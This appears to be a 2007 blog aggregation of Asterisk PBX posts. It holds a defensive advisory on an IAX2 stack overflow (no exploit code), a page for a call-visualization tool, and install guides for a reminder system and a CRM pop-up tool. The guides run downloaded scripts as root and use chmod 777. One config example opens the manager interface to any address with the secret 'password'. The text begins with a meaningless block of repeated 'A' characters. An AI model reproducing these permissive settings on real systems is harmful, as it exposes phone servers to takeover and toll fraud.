AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Fix Information:
Updated packages for:
Asterisk can be found on http://www.asterisk.org
AsteriskNOW can be found on http://www.asterisknow.org

Stack Buffer Overflow in Asterisk's IAX2 Channel Driver

2007-09-18T11:19:00.001-07:00

The Asterisk IAX2 channel driver, chan_iax2, has a remotely exploitable stack buffer overflow vulnerability. It occurs when chan_iax2 is passed a voice or video frame with a data payload larger than 4 kB. This is exploitable by sending a very large RTP frame to an active RTP port number used by Asterisk when the other end of the call is an IAX2 channel. Exploiting this issue can cause a crash or allow arbitrary code execution on a remote machine.

Credit:
The information has been provided by Russell Bryant.
The original article can be found at: http://ftp.digium.com/pub/asa/ASA-2007-014.pdf

What if you could scan your network for all the vulnerabilities on SecuriTeam.com, automatically, every day?

Vulnerable Systems:
* Asterisk Open Source versions prior to 1.2.22
* Asterisk Open Source versions prior to 1.4.8
* Asterisk Business Edition versions prior to B.2.2.1
* AsteriskNOW prerelease versions prior to beta7
* Asterisk Appliance Developer Kit versions prior to 0.5.0
* s800i (Asterisk Appliance) versions prior to 1.0.2

Immune Systems:
* Asterisk Open Source version 1.2.22
* Asterisk Open Source version 1.4.8
* Asterisk Business Edition B.2.2.1
* AsteriskNOW Beta7
* Asterisk Appliance Developer Kit version 0.5.0
* s800i (Asterisk Appliance) version 1.0.2

The specific conditions that trigger the vulnerability are the following:
* iax2_write() is called with a frame with the following properties a voice or video frame
* Its 4-byte timestamp has the same high 2 bytes as the previous frame that was sent
* Its format is the one currently expected
* Its data payload is larger than 4 kB

iax2_write() calls iax2_send() to send the frame. Inside of iax2_send(), there is a conditional check to determine whether the frame should be sent immediately (the now variable) or queued for transmission later.

If the frame is going to be transmitted later, an iax_frame struct is dynamically allocated with a data buffer that has the exact buffer size needed to accommodate for the provided ast_frame data. However, if the frame is being sent immediately, it uses a stack allocated iax_frame, with a data buffer size of 4096 bytes. Later, the iax_frame_wrap() function is used to copy the data from the ast_frame struct into the iax_frame struct. This function assumes the iax_frame data buffer has enough space for all of the data in the ast_frame.

Resolution:
This issue is only exploitable when the system is configured in such a way that calls between channels that use RTP and IAX2 channels are possible. Also, some additional protection against arbitrary code execution is provided if the call involves transcoding between audio formats as this will change the contents of the frame payload.

All users that have systems that connect calls between channels that use RTP and IAX2 channels should immediately update to versions listed in the corrected in section of this advisory.

CVE Information:
CVE-2007-3762

Astsee

2007-09-17T14:45:00.001-07:00

Astsee

A [fun] pbx usage auditing tool

Screenshots (click for bigger)

version 0.1

version 0.4

Overview
Astsee is a fun, graphical way to see what's going on in your asterisk server. Upon first startup the layout is empty, but it connects to your asterisk server's manager interface to receive notifications of new channels and links. As channels are detected, they are added to the layout. As links are made and broken, animated lightning graphically shows the bridge between the pertinent channels.

This is pre-release software. Proceed at your own risk. Don't hurt your goldfish. If you do, I'm not replacing it.

What works:

SIP, Zap, and IAX[2] channels are added to the layout when asterisk mentions them
Bridges between channels are drawn graphically
Nodes are arranged prettily in a circle (But press 'R' to randomize their positions)
The CallerID info is available by hovering the mouse over the nodes
Transferring a call seems to mostly work, including parking a call and retrieving it from the same or any other location.

What doesn't work but I would like to implement eventually:

You can't delete nodes from the layout
You can't specify a filter of techs/channels to ignore
Meetme rooms aren't handled, but create superfluous node "Zap/pseudo"
Echo chamber results in a superfluous node with tech "SIP" and channel "SIP"
You can't destroy bridges (drop the call)
You can't drag and drop the terminii of the bridges to transfer a call
You can't disable animations for slower computers
Various media players and resource-intensive virtual guests cause Astsee to behave at a snail's pace
You can't configure the colors or graphics (you can replace the 64x64 node_gfx.tga with your own if you want)
If you mis-specify the manager username/secret, Astsee will simply crash :(
Nodes exist in perpetuity once detected. I would like to option for them to time out after a set time, or at least fade away a bit
The mouse leaves droppings
This one is my favorite. I'll surprise you later. I'm really excited about it. Traces of this hint can be found in version 0.5!

Again, ALPHA software. It runs in windowed mode, 800x600, 16bpp. It requires socat. 'apt-get install socat' for that, if on ubuntu or debian. If not on ubuntu, or these instructions don't work for your debianish distribution, you can try socat. I linked in static versions of allegro into my binaries so you wouldn't have to have allegro even installed.

Download
• Linux i386 ELF binary version 0.5 - NEW! The not-afraid-to-show-your-dad version! But can you find the secret? astsee-0.5.tgz
• Linux i386 ELF binary version 0.4 - Things kinda work! astsee-0.4.tgz
• Linux i386 ELF binary version 0.2 - Shoddy mouse support! astsee-0.2.tgz
• Linux i386 ELF binary version 0.1 - astsee-0.1.tgz
• Source now available. Innovate! Source code packages If it doesn't run on your machine, tell me what it DOES do and I'll see if I can make it work for you.
• Sorry, a Windows version is not possible right now because I can't find socat available for Windows.

Usage
$ ./astsee host/ip port username secret

Example:
$ ./astsee 10.0.0.252 5038 mojo *****

Of course, this is the manager username/secret configured in asterisk's manager.conf.

Introducing Telephone Reminders 3.0: The Free Asterisk Telephone Reminder System

2007-09-17T14:41:00.000-07:00

Tomado de http://nerdvittles.com/index.php?p=180

Filed under:

— ward @ 1:00 am

It's free software day again at Nerd Vittles, and today we're updating our Telephone Reminder System for Asterisk to version 3. The original system let you schedule reminders for future events and, when the appointed date and time arrived, Asterisk swung into action and placed a call to the number you designated to deliver your customized reminder message. Today we add the bells and whistles that just about everyone using the original application requested. Now you can set up recurring reminders that call daily or on weekdays as well as weekly, monthly, and annually. This means it can be used to wake you up in the morning, or to remind Granny to take her medicine every day, or to remind your Little League team of practice times and locations, or to remind you and your customers of scheduled and recurring events.

The smarts for the original system already have been incorporated into our TeleYapper 2.5 Voice Messaging System. But that's a real-time system meaning it begins calling immediately after you choose a group of people to call. This phone reminder system is different in that you can schedule the calls for the near or distant future, you can specify different numbers for the calls, and you can customize the recorded messages for each call. In short, it's perfect for appointment reminders, birthday reminders, anniversary reminders, and anything else you want to remember. All it takes is a phone call to set up each reminder. There's no web page to fill in and no database required to manage the reminders. You can schedule as many reminders per phone number as your little fingers care to dial! And, in our next article, we'll show you how to use a single entry from the new Asterisk Telephone Reminder System to contact a small or large group of people on a recurring basis.

Prerequisites. We've tested version 3 of our appointment reminder system with ISO-installed versions of Asterisk@Home 2.5 and TrixBox 1.2.3 in addition to the Nerd Vittles VMware builds of TrixBox 1.2.3. If you wish to use it with later versions of TrixBox or with a "pure Asterisk" system (not 1.4!), then you shouldn't have any problems. It won't work with version 1.x of Asterisk@Home or 1.4 releases of Asterisk. Post a comment if you have problems. You also will need a system which includes PHP to run this application. We've tested it with PHP 4.3.9, but PHP 5 systems probably will function without many changes in the underlying code. You should be able to install this project and get everything working in under 30 minutes. For those using our VMware TrixBox builds or our Linux PBX-in-a-Flash script for TrixBox 1.2.3 which can be downloaded at the top of this page, we'll walk you through the 5-minute upgrade drill so that you can take advantage of the new Version 3 recurring reminders feature set. If you're installing Telephone Reminders for the first time, complete installation instructions are available on our Best of Nerd Vittles site.

How It Works. The reminder system is actually quite simple to use. You dial extension 1-2-3 on your Asterisk system, enter your password, and then you'll be prompted to record a reminder message. Next you enter the phone number, date, and time for delivery of the reminder message. Finally, you're prompted whether to schedule a single reminder or recurring reminders (weekdays, daily, weekly, monthly, or annually). When the appointed date and time arrives, Asterisk will place the call to the number you specified using your default dialing rules and will play the customized reminder when the call is answered. If the call is not answered, the call will be repeated n number of times with a delay between calls of x minutes before giving up on the call. You'll get an email with the call reminder setup if desired. You also get to configure the number of retries and the delay between calls. Finally, end of the month recurring reminders pose a special problem. Why? Because not all months end on the same numbered day. January has 31, February has 28, April has 30. You get the idea. So the default behavior is as follows, If you schedule monthly reminders on the last day of any month, then we assume you want the reminders delivered on the last day of every month. You can alter this behavior by setting a flag in the reminder.php script if you want monthly reminders to always be delivered on the 28th day of the month, for example.

Finally, a word about failed calls. Reminders are important to most folks, or you wouldn't be scheduling them. So failed calls are problematic. On the one hand, you don't want to overburden your phone system placing thousands of reminder calls just because the calls continue to fail. You may have entered an incorrect phone number, for example. So our middle-of-the-road solution to failed calls is this. You can tell the system how many times to repeat the call and how much time to eat up between attempts. If the call still fails, non-recurring reminders will be deleted from the system. But the reminder message is preserved as well as the recurring reminder for the next date on which to place the call. If you look in /var/lib/asterisk/sounds/custom on your system, you will see some custom sound files (such as the reminder prompts which all begin with reminder). In addition, you will see the actual reminder messages for each of your reminders. The naming convention is HourMinute.Date.PhoneNumber.gsm. If you see entries in this directory with dates before today's date, those are failed call reminders. You can play the sound files on most computers by simply double-clicking on the files. You can delete old reminders for a specific date while logged in as root on your Asterisk system with a command like this:
rm -f /var/lib/asterisk/sounds/custom/*.20060123.*.gsm
Be sure you don't delete today's reminder messages or messages with a future date, or your entire reminder system will be toast!

Here are the components that make up the complete system:

AutoAttendant Contexts to Create Reminders

Code Snippet to Answer 1-2-3 Calls

Allison Voice Prompts for Telephone Reminder 3.0 IVR Interface

checkdate.php AGI script to Check for Dates in the Past

checktime.php AGI script to Check for Times in the Past

reminder.php AGI script to Schedule Calls

Reminder Call Processing Contexts

run_reminders script to Check for Today's Reminders

run_recurring script to Reschedule Recurring Reminders Due Today

Limitations. There are a few limitations you need to be aware of. First, you can't schedule delivery of a reminder within the first 5 minutes after midnight each night. That's when the reminder system does its housekeeping. Second, you must schedule reminders at least 5 minutes after you place your call to set up the reminder. This gives the system ample time to generate the configuration files it needs and to put them in the right places. Third, the current reminder system does not fully support simultaneous scheduling of multiple reminders. The current system uses unique names to identify sound files generated by multiple simultaneous callers. However, it still is theoretically possible for two different callers to schedule two reminders for the same phone number and the same reminder time and to do so at the exact same time. This would cause one of the reminders to be discarded. We just wanted to alert you to this remote possibility. But we hasten to add that the chance of this happening is pretty small even in a very large Asterisk system with hundreds of users.

License. This software is licensed for your use under a Creative Commons Attribution-ShareAlike 2.5 license. Before using this software, please read the terms of the license. A Plain English version of the license is available here. You may not charge a fee for something we are giving you for free. Finally, we ask that you preserve our copyright notice in any copies of the software you make. The same applies to derivative works. If you do not accept the terms of the license, do not use the software. Even if you accept the terms of the license, keep in mind that BY USING THIS SOFTWARE, YOU ASSUME ALL RISKS OF USE AND NO WARRANTIES EXPRESS OR IMPLIED ARE PROVIDED WITH THIS FREE SOFTWARE INCLUDING FITNESS FOR A PARTICULAR USE AND MERCHANTABILITY. In short, it's up to you to determine, at your own risk, whether this software meets your needs. Don't assume that it will, and don't assume that the code is error-free. It's probably not.

The Game Plan. In today's article, we're going to walk you through upgrading a system on which you already have installed an earlier version of our Telephone Reminders system. As mentioned, if you're installing the software for the first time, stop here and use our Best of Nerd Vittles tutorial. To get the Reminder System upgraded, we're first going to move all of the code into the proper places. This includes the modifications to the dialplan contexts, installation of a new Allison voice prompts, and installation of the upgraded PHP/AGI scripts. Then we'll walk you through configuring the system. And finally we'll schedule a reminder to make sure everything went according to plan.

Modifying Your Dialplan. Step #1 is to replace some code that's already in your dialplan. The original contexts in extensions_custom.conf looked like this. Find ALL of this code (toward the bottom of the extensions_custom.conf file or, for TrixBox systems, extensions_trixbox.conf in the /etc/asterisk directory on your system) and delete it. The contexts to delete are the following: reminder, reminder2, reminder3, reminder4, reminder5, reminder6, reminder7, reminder8, reminder9, remindem, and remindem2. Replace the deleted contexts with this version 3.0 code.

For Step #2, make sure the following code snippet is still located in the top section of extensions_custom.conf in the [from-internal-custom] context or, for TrixBox systems, extensions_trixbox.conf in the [from-internal-trixbox] context:
exten => 123,1,Answer exten => 123,2,Wait(1) exten => 123,3,Authenticate(12345678) exten => 123,4,Goto(reminder,s,1)
If, for some reason, you already are using extension 1-2-3 on your Asterisk system for some other purpose, then simply adjust the 123 extension in the four lines above to another number that works on your system. This is the number you will dial to schedule reminders. Line 3 is important as well. This is where you set a password for scheduling reminders on your system. Anyone that knows the password can schedule reminders. Simply replace 12345678 with a password that's secure enough for you to sleep well.

Finally, a head's up. When you do the cut-and-paste, double-check the long lines of code such as h,1 in [reminder9] and be sure all of the text ends up on a single line. Otherwise, things won't work correctly. Once you've added the two sections of code above, save your new config file and reload Asterisk.

Installing Reminder Voice Prompts. These voice prompts are free for the taking subject to the terms of the license agreement, and they're all the same as version 2.5 except there is a new reminder6.gsm. Just log into your Asterisk server as root and enter the following command to install the new voice prompt:
cd /var/lib/asterisk/sounds/custom wget http://nerdvittles.com/aah2/reminder6.gsm chmod 664 reminder*.gsm chown asterisk:asterisk reminder*.gsm

If you need all of the voice prompts, then use these commands instead:
cd /var/lib/asterisk/sounds/custom wget http://nerdvittles.com/aah2/nv-reminder3_voice.zip unzip nv-reminder3_voice.zip (be sure to overwrite existing files!) chmod 664 reminder*.gsm chown asterisk:asterisk reminder*.gsm rm -f nv-reminder3_voice.zip

Installing the Reminder PHP/AGI Scripts. Now we're getting to the new code for version 3. While you're still logged in as root, let's install the final pieces of code that you'll need to get things working. Just execute the commands below:
cd /var/lib/asterisk/agi-bin mv reminder.php reminder25.php mv run_reminders run_reminders.25 mv checkdate.php checkdate25.php mv checktime.php checktime25.php wget http://nerdvittles.com/aah2/nv-reminder3.zip unzip nv-reminder3.zip chmod 775 reminder.php chown asterisk:asterisk reminder.php chmod 775 check*.php chown asterisk:asterisk check*.php chmod 777 run_reminders chown asterisk:asterisk run_reminders chmod 777 run_recurring chown asterisk:asterisk run_recurring

Creating Reminders Directories. While you're still logged in as root, create the following directories to store your reminders until the day arrives to execute them. Just issue the following commands. You should already have the reminders directory, but it won't hurt execute the command again just to be sure.
su asterisk cd /var/spool/asterisk mkdir reminders mkdir recurring exit

Setting Up the Crontab Entries. Now we need to set up the cron jobs to actually move reminders and recurring reminders into the Asterisk call processing directory on the day they are scheduled to run. Be very careful here. If you already have a working Telephone Reminders system, then there will already be an entry for run_reminders. For the new system to work, you MUST adjust the time that the run_reminders script executes so that it occurs AFTER the run_recurring script each day. While logged in as root, edit the crontab file: nano -w /etc/crontab. Be sure you typed the exit command in the last step, or you'll be logged in as asterisk instead of root. And you won't be able to edit the file! Now insert the following commands at the bottom of the crontab file and delete the existing run_reminders entry if you have one. Each command below should go on its own line.
0 0 * * * root /var/lib/asterisk/agi-bin/run_recurring >/dev/null 2>&1 3 0 * * * root /var/lib/asterisk/agi-bin/run_reminders >/dev/null 2>&1
Once you've added the two news lines and deleted the existing run_reminders line, save your changes: Ctrl-X, Y, then press Enter. Whew! That's it for the Reminder code. Now let's configure the system, and you'll be all set.

Configuring the Reminder System. To configure the reminder system, you'll need to edit the reminder.php script while logged in as root: nano -w /var/lib/asterisk/agi-bin/reminder.php. You'll notice a section of variables at the top of the file that looks like this:
$endofmonthflag=1 ; $extensionmaxdigits=4 ; $debug = 1; $newlogeachdebug = 1; $emaildebuglog = 0; $email = "yourname@yourdomain" ; $trunk = "local" ; $callerid = "6781234567" ; $numcallattempts=6 ; $calldelaybetweenruns=300 ; $timetoring=40 ; $acctcode= "Reminder" ;
This is the only section of code you ought to mess with. When we update the code, we'll assume everything else has been left intact. Be very careful when editing this file. Don't remove any semicolons or quotation marks, or nothing will work! Here's a quick run-down on what each of the above variables does:

$endofmonthflag=1 ... Forces monthly recurring reminders scheduled on the last day of a month to the last day of every succeeding month

$extensionmaxdigits=4 ... Sets the maximum number of digits for treating outbound calls as calls to local extensions.

$debug = 1 ... If set to 1, then a debug log is created in /var/log/asterisk/reminder.txt. Instructions for deleting reminders are in the log.

$newlogeachdebug = 1 ... If set to 1, then a new debug log is created each time a reminder is scheduled. Otherwise, file grows and grows.

$emaildebuglog = 0 ... If set to 1, the debug log is emailed to the email address set below when each reminder is scheduled.

$email = "yourname@yourdomain" ... Enter your actual email address between the quotation marks. Only works if line above is set to 1.

$trunk = "local" ... If set to "local", calls are routed using your default dialplan rules. Otherwise, specify a trunk to use, e.g. "sip/telasip-gw".

$callerid = "6781234567" ... Specify your caller ID number. Only used if $trunk is not set to "local" above.

$numcallattempts=6 ... If there is no answer on the Reminder call, how many times should Asterisk attempt to deliver the reminder?

$calldelaybetweenruns=300 ... How many seconds delay should there be between failed call attempts to deliver a reminder?

$timetoring=40 ... How many seconds should the call ring when attempting to deliver a reminder?

$acctcode= "Reminder" ... What accouting code should be used for reminder calls?

Once you've configured the Reminder System to meet your needs, save your changes: Ctrl-X, Y, then press Enter. HINT: You may want to start with the defaults which will work well for most folks.

Scheduling A Reminder. We're ready to take the Reminder System for a trial run at this juncture. Make sure you've reloaded your Asterisk system, and then dial 123 from an extension on your system. Enter the password you set up for your system and then press the pound key.

Entering a Reminder Message. You'll first be prompted to record a reminder message. This is the message that will be played when someone answers the reminder call. If you're not scheduling this reminder for yourself, then the message ought to explain who's calling and what the purpose of the call is. Once you've recorded your message, press the pound key to end the recording. You can replay or rerecord the reminder if desired while you're in this step of the reminder creation process.

Entering the Callback Number. When prompted for the reminder callback number, there are a couple of things to keep in mind. First, if you've specified "local" as the trunk to use for reminders in the reminder.php script, then the phone numbers can be entered in any format supported by your dialplan. Press the pound key after entering the appropriate number. The calls will be placed using the trunks specified in your dialplan rules. The one exception is extensions on your local Asterisk system since these can't be routed by Asterisk@Home or TrixBox systems using your outbound calls dialplan rules. The way we handle extensions is by examining the length of the phone number. At the top of reminder.php, you can specify the maximum number of digits for local extensions by setting $extensionmaxdigits. So long as the callback number is less than or equal to this number of digits, the system has the smarts to correctly route the call to a local extension.

If you have designated a particular trunk for placement of reminder calls, then you'll need to make certain that the format of the phone numbers entered for reminders on your system matches a dial string supported for this outbound trunk in your dialplan. For example, if this trunk requires that calls be entered with a 1 and then an area code and 7-digit number, then that is the only format that should be used for entering callback numbers in your reminder system. Again, the one exception is calls to local extensions. So long as the number of a local extension is entered with less than or equal the number of digits set for the $extensionmaxdigits variable in reminder.php, the call will be routed properly to the local extension regardless of the trunk setting.

Finally, here's a shortcut that can be used if the phone you're using to schedule the reminder is the same one on which you want to get the reminder callback. In this case, just press the pound key when prompted for the number to which to deliver the reminder message. This will set the callback number as the caller ID of the phone you used to schedule the call. If it's a local extension, then the caller ID will be set to the local extension number of the phone from which you placed the reminder scheduling call. Just be sure your $extensionmaxdigits is set correctly or calls to local extensions will fail.

Entering the Date of the Reminder. Once you accept the reminder message, you'll be prompted to enter the date on which this reminder will be delivered. Dates are entered using a four-digit year, then a two-digit month, and then a two-digit day using the time zone of the Asterisk system running the Telephone Reminders System. There is some error correction but not much. You obviously can't schedule reminders in the past! And you don't need to press the pound key after entering the eight digits. Beginning in version 2.5, you now can press the pound key (#) instead of entering an 8-digit date, and the system will set the reminder date to today. Once you've entered a date, the system will tell you what date you entered including the day of the week. If the entry is correct, just press 1 to move on.

Entering the Time of the Reminder. Now you'll be prompted to enter the delivery time for your reminder. Times are entered as a two-digit hour and two-digit minute using the time zone of the Asterisk system running the Telephone Reminders System. For times less than 1200, you will be prompted whether you meant AM or PM. For those that understand military time, you can avoid this step by entering times using the format: 1345 which means 1:45 p.m. You don't need to press the pound key after entering the four-digit time for delivery of your reminder. Keep in mind that you cannot schedule a reminder for delivery in the first five minutes after midnight. Other times "in the midnight hour" should be entered in the format: 0045 which means 12:45 a.m. Keep in mind that reminder times always must be at least 5 minutes in the future. Finally, you cannot schedule two reminders for the exact same date and time for delivery to the same phone number. Once you enter a delivery time, the system will play back both the date and time for the reminder as a precaution. Press 1 to accept your entries.

Entering Recurring Reminders. Beginning with version 3, you now will be prompted whether to schedule (1) a single reminder, (2) a recurring reminder every weekday (M-F), (3),a recurring reminder every day, (4) a recurring reminder every week, (5) a recurring reminder every month, or (6) a recurring reminder every year. Once you make a selection, your reminder will be scheduled. If you choose an option other than 1 through 6, a single reminder will be scheduled.

Where Reminders Are Stored. There are actually two files that make up each reminder: the .call file which places the actual call and the .gsm file which is the reminder message itself. The file naming convention is HourMinute.Date.PhoneNumber with either a .call or .gsm extension. The sound files are all stored in /var/lib/asterisk/sounds/custom. For recurring reminders, duplicates of the .call script and the .gsm message are stored in /var/spool/asterisk/recurring with the date of the next recurring reminder. At midnight on the next scheduled date, the two files are copied to the /var/spool/asterisk/reminders and /var/lib/asterisk/sounds/custom folders respectively. Then the next scheduled reminder date is set in the two filenames. For single reminders, prior to the delivery date of the reminder message, the .call file is stored in /var/spool/asterisk/reminders. Then, at 12:03 am on the date the reminder is scheduled for delivery, the run_reminders script in /var/lib/asterisk/agi-bin moves the affected .call files to /var/spool/asterisk/outgoing. The .call files in the outgoing directory are reviewed every minute of the day by Asterisk. By examining the time stamp of the file, Asterisk looks for a match with the current hour and minute of the day. Once the time for the call arrives, Asterisk processes the .call script and places the call. All dialing retries are handled internally by Asterisk with no user or program control so it's important to set your default values correctly in the reminder.php script as explained above. Once the .call file is processed, Asterisk discards the file whether the call was successful or not. As noted above, the reminder message file is only discarded if the call is completed successfully. So, from time to time, you do need to review the contents of /var/lib/asterisk/sounds/custom and discard reminder messages, if any, with dates in the past. Note also that, if you begin scheduling a reminder and change your mind and hang up after recording a reminder message, that recorded message will still exist in /var/lib/asterisk/sounds/custom.

Finally, a word of caution about the reminder message files: be very careful in deleting these files. The message files and .call files are linked by filename only, and there is no error detection or correction if the message file gets discarded before the time for the reminder call arrives. What would happen in such a situation is the call would be placed, someone would answer, Allison would say "please hold for an important reminder," and then there would be a brief silence followed by Allison saying "to repeat this reminder, press 1; otherwise, press 2" which is not entirely helpful. To delete a recurring reminder, delete both the .call and .gsm files from /var/spool/asterisk/recurring. Note that the .call file will have an additional extension which tells the recurring type, e.g. .daily, .weekly, etc.

Reminder and Wakeup Call Processing. It has been documented that flooding Asterisk with a bunch of .call scripts simultaneously can cause some of the scripts to be discarded without being executed. We hope this has been resolved in Asterisk 1.2.4, but just be alert to the possibility of a problem if multiple calls are scheduled at exactly the same time to different numbers.

When you're first getting started with the reminder system, it's probably a good idea to fire up Asterisk's Command Line Interface (CLI): asterisk -rvvvvv. Then you can watch as the reminders are scheduled and reminder calls are placed. Just schedule a reminder for five minutes from the time you begin the reminder call, and you'll be all set to give it a whirl. By default, there's also a reminder log file produced for the last reminder call placed. You can display this file with the following command: cat /var/log/asterisk/reminder.txt.

For Programmers Only. If you're just getting into PHP and AGI programming with Asterisk, then have a second look at reminder.php. In particular, take a look at the section of code that begins with parse agi headers into array. As best we can tell, our initial tutorial on Telephone Reminders was the first version of this subroutine written in PHP that actually worked. We've tried to repeat our success here. If you review the log file (reminder.txt), you will see a listing of all the AGI headers which are passed by Asterisk to PHP. But this is the first code we've seen that correctly reads the headers into variables where you can actually retrieve the content. We call it a feature. For example, the commented out line ($tmp = $agi['dnid']) shows the syntax to retrieve the DNID value from Asterisk. Just make a mental note that the parse AGI headers code in reminder.php actually works. Some of our previous code inherited the mistakes of others, but we've now taken the time to get this functioning properly because we needed it for something else. Here's the complete list of AGI headers that can be saved to variables in your PHP code should the need ever arise:
read: agi_request: reminder.php read: agi_channel: SIP/204-6a1a read: agi_language: en read: agi_type: SIP read: agi_uniqueid: 1138010325.1367 read: agi_callerid: "Line2" <204> read: agi_dnid: 123 read: agi_rdnis: unknown read: agi_context: reminder9 read: agi_extension: h read: agi_priority: 2 read: agi_enhanced: 0.0 read: agi_accountcode:
You'll also want to take note of a little quirk in Asterisk (compared to some PBXs). To decipher the extension which actually placed a call, you must parse the agi_channel variable for the data between the slash and hyphen characters since the DNID (dialed number identifier) returns the extension being called (as opposed to the originating extension) when an internal call is placed. Here's one PHP approach to get the answer which in this case happens to be extension 204. Regex wizards could probably save a line of code, but who cares.
$CallingID = substr(stristr($agi['channel'],"/"),1); $CallingID = substr($CallingID,0,strrpos($CallingID,"-"));

Web Interface to Telephone Reminders. We've built a very simple web page that will let you review which reminders are pending on your system. Recurring reminders are NOT yet included excepted those scheduled for delivery today. You can access the web page directly at http://192.168.0.111/reminders/ using the IP address of your Asterisk system. To install the Telephone Reminders web interface, log into your Asterisk system as root and then issue the following commands:
cd /var/www/html mkdir reminders cd reminders wget http://nerdvittles.com/aah2/webreminder.zip unzip webreminder.zip rm webreminder.zip

Be advised that we are just getting started with a web interface to the Telephone Reminders application. Stay tuned for loads of additional features!

Security Reminder. If you plan to open the Asterisk web interface on your system to the public Internet, make sure to take security precautions to reduce the risk of a stranger trashing your system or running up your phone bill. Just click here and search for our articles on security to get your system up to speed.

Hot Tip! O'Reilly's must-have book, Asterisk: The Future of Telephony, is still available for free download here under a Creative Commons license. This is a cleaned up version of the original PDF which fixes pagination and compresses the file size to 3.9MB using Acrobat's Reduce File Size tool. Requires at least Acrobat 4 to load. Special thanks to Alexander Burke for all the hard work cleaning this up.

Email Delivery of Reminders. Assuming you have email messaging working on your Asterisk system, Telephone Reminders has the ability to deliver an email copy of reminders to the recipient in addition to a phone call. Be advised that, if the phone call is never completed, the email copy of the reminder will not be delivered. The reason for this is because Asterisk never passes the call to the context which handles delivery of the email message until the call is connected. So ... no connection, no email. However, if the recipient has an answering machine or voice mail, that would trigger delivery of the email message.

Once you've installed the new contexts to support email messaging, step two is registering email addresses for extensions and phone numbers to which you want email reminders delivered. Log in to your Asterisk server as root, and start up the Command Line Interface (CLI): asterisk -r. For each extension and phone number for which you want to activate email reminders, enter a command at the CLI prompt that looks like this: database put EMAIL 6781234567 joe@schmo.com where 6781234567 is the phone number of the reminder recipient and joe@schmo.com is the recipient's email address. You can display all existing EMAIL addresses that have been entered into your Asterisk database with this command: database show EMAIL. If you need to modify an existing entry, simply delete it and reenter it. To delete an existing entry, use the following syntax: database del EMAIL 6781234567.

MIME-Construct: Wherefore Art Thou? A Linux utility, MIME-Construct, made it easy to convert images (like faxes) to PDF documents and also facilitated the emailing of just about any other document including reminder messages. Unfortunately, it came up missing in TrixBox, and it's difficult to install because of all the Linux dependencies. So here's a simple solution that restores the original functionality of MIME-construct thanks to the programming genius of Rob Thomas. Since Rob's fax-process.pl code (included in freePBX) mimics the old MIME-construct application, the simple solution was just to tweak it a bit for Nerd Vittles and TrixBox compatibility and then copy a renamed version into the PATH (remember the DOS PATH!) on your Linux box. Log in as root and issue these commands, and you'll be back in the mime-construct business with TrixBox:
cd /usr/local/bin wget http://nerdvittles.com/trixbox123/mime-construct chmod +x mime-construct

Note In

2007-09-17T13:06:00.000-07:00

Client installation and configuration :

ADM ( Asterisk Desktop Manager )

Installation linux/Unix :

Step 1 - Adm Installation :

Download the file here.
Unzip it, then run it.
After this, download our configuration script here, then run it.

    wget www.modulis-voip.com/fileadmin/uploads/notein/ADM_unix_1_1_jre1_5_bundle.sh

     gunzip ADM*.gz

    sh ADM_unix_1_1.sh

Step 2 - Automatic configuration of adm :

    wget www.modulis-voip.com/fileadmin/uploads/notein/script_install.sh

    sh configure_adm.sh

Run adm

adm

Note : If you don't use the configuration script, don't forget to exec the following commands :

cd /usr/bin

ln -s firefox mozilla-firefox

If you got a problem, close then restart adm.

Windows Installation :

Step 1 - adm installation :

Download the file here.
Unzip it, then run it.

Step 2 - Manual configuration of adm :

Run ADM.
Right click on the ADM icon in your taskbar.

Go to : Configurations -> Edit current -> Asterisk
-> Manager

Complete this fields :

 Hostname :  servervoip.hostname.com

 port : 5038

 username : adm

 password : password

-> Extensions

 Context : EXTENSION-CONTEXT exemple : "from-sip" ou "default"

 Source : SIP/ext       exemple : SIP/202

-> Browser pop-up

Check "Enable Incomming records"

 URL :  "http://servercrm.hostname.com/sugarcrm_path/pp_index.php?number=%number%"

 Usually check "Disable crm popup for internal calls" too.

 "Disable crm popup for outgoing calls" Check thi one will disable pop for outgoing calls.

Step 1 - CRM server installation :

On Linux/Unix servers :

Download .tar file here.
Unzip and run the file : install_noteIn.sh
With bash commands :

wget www.modulis-voip.com/fileadmin/uploads/notein/Sugar_NoteIn_beta1.tar tar -xvf Sugar_NoteIn_beta1.tar chmod +x install_noteIn.sh ./install_noteIn

Windows servers or Manual installation :
Download .tar file here.
Copy/Past files pp_index.php and pp_contact/ into your sugarcrm directory.

wget www.modulis-voip.com/fileadmin/uploads/notein/Sugar_NoteIn_beta1.tar tar -xvf Sugar_NoteIn_beta1.tar chmod -R 755 src/* cp src/* /path/to/sugarcrm/

Step 2 - Asterisk server installation :

Into your directory /etc/asterisk, add the following modifications :

2.1.Add into manager.conf file

cd /etc/asterisk vim manager.conf [general] enabled = yes [adm] secret = password permit=0.0.0.0/0.0.0.0 permit=127.0.0.1/255.255.255.0 permit=172.21.1.32/255.255.255.0 read = system,call,log,verbose,command,agent,user write = system,call,log,verbose,command,agent,user

2.2.Add into /etc/asterisk/extensions.conf

This part is only needed if you want to use sugar NoteIn* with outgoing calls.

Those following lines are currently worling for FreePBX. In a custom dialplan, the lines you must add are close to this one.

You just have to add this line in the right context on the right place :

exten => s,n,Set(DIAL_NUMBER=${DIAL_NUMBER})

Where "DIAL_NUMBER" is your dialplan variable.

2.2.1 #Into [macro-exten-vm] context :

exten => s,n,Set(EXTTOCALL=${ARG2})
...
exten => s,n,NoOp(-----------------------******************-----)
exten => s,n,SetGlobalVar(ADM=${EXTTOCALL})
exten => s,n,NoOp(-----------------------******************-----)
...
exten => s,n,Set(CFUEXT=${DB(CFU/${EXTTOCALL})})

2.2.2 #Into [macro-dialout-trunk] context :

exten => s,n,Set(DIAL_NUMBER=${ARG2})

...

exten => s,n,NoOp(-----------------------******************-----)

exten => s,n,SetGlobalVar(ADM=${DIAL_NUMBER})

exten => s,n,NoOp(-----------------------******************-----)

...

exten => s,n,Set(ROUTE_PASSWD=${ARG3})

